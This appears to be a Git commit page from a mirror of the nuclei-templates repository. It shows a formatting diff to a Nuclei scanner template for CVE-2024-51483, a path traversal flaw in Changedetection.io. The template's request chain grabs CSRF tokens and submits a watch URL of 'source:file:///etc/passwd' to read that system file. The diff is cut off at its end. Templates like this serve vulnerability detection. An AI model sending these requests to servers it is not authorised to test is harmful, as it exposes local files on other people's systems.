daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

updated info, fix format

patch-14
Ritik Chaddha 2024-11-12 18:52:00 +05:30 committed by GitHub
parent c5fc2a6404
commit 07c73411e1
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 12 additions and 11 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

23
http/cves/2024/CVE-2024-51483.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2024-51483
info:
name: Changedetection.io <= 0.47.4 Path Traversal
name: Changedetection.io <= 0.47.4 - Path Traversal
author: iamnoooob,rootxharsh,pdresearch
severity: medium
description: |
@ -13,8 +13,12 @@ info:
- https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-cwgg-57xj-g77r
- https://github.com/user-attachments/files/17591630/CL-ChangeDetection.io.Path.Travsersal-311024-181039.pdf
classification:
cvss-score: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
cve-id: CVE-2024-51483
cwe-id: CWE-22
epss-score: 0.00045
epss-percentile: 0.16805
cpe: cpe:2.3:a:changedetection:changedetection:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 6
@ -30,17 +34,15 @@ http:
- |
GET /settings HTTP/1.1
Host: {{Hostname}}
Upgrade-Insecure-Requests: 1
Connection: keep-alive
extractors:
- type: regex
name: csrf
internal: true
part: body
group: 1
regex:
- 'name="csrf_token" value="(.*)?"'
group: 1
internal: true
- raw:
- |
@ -60,11 +62,11 @@ http:
extractors:
- type: regex
name: csrf2
internal: true
part: body
group: 1
regex:
- 'name="csrf_token" value="(.*)?"'
group: 1
internal: true
- raw:
- |
@ -74,12 +76,11 @@ http:
csrf_token={{csrf2}}&url=source%3Afile%3A%2F%2Fetc%2Fpasswd&tags=&watch_submit_button=Watch&processor=text_json_diff
matchers-condition: and
matchers:
- type: dsl
internal: true
dsl:
- "status_code==302"
internal: true
- raw:
- |
@ -89,11 +90,11 @@ http:
extractors:
- type: regex
name: uuid
internal: true
part: body
group: 1
regex:
- '/etc/passwd"><\/a>\n.*?uuid=(.*?)"'
group: 1
internal: true
- raw:
- |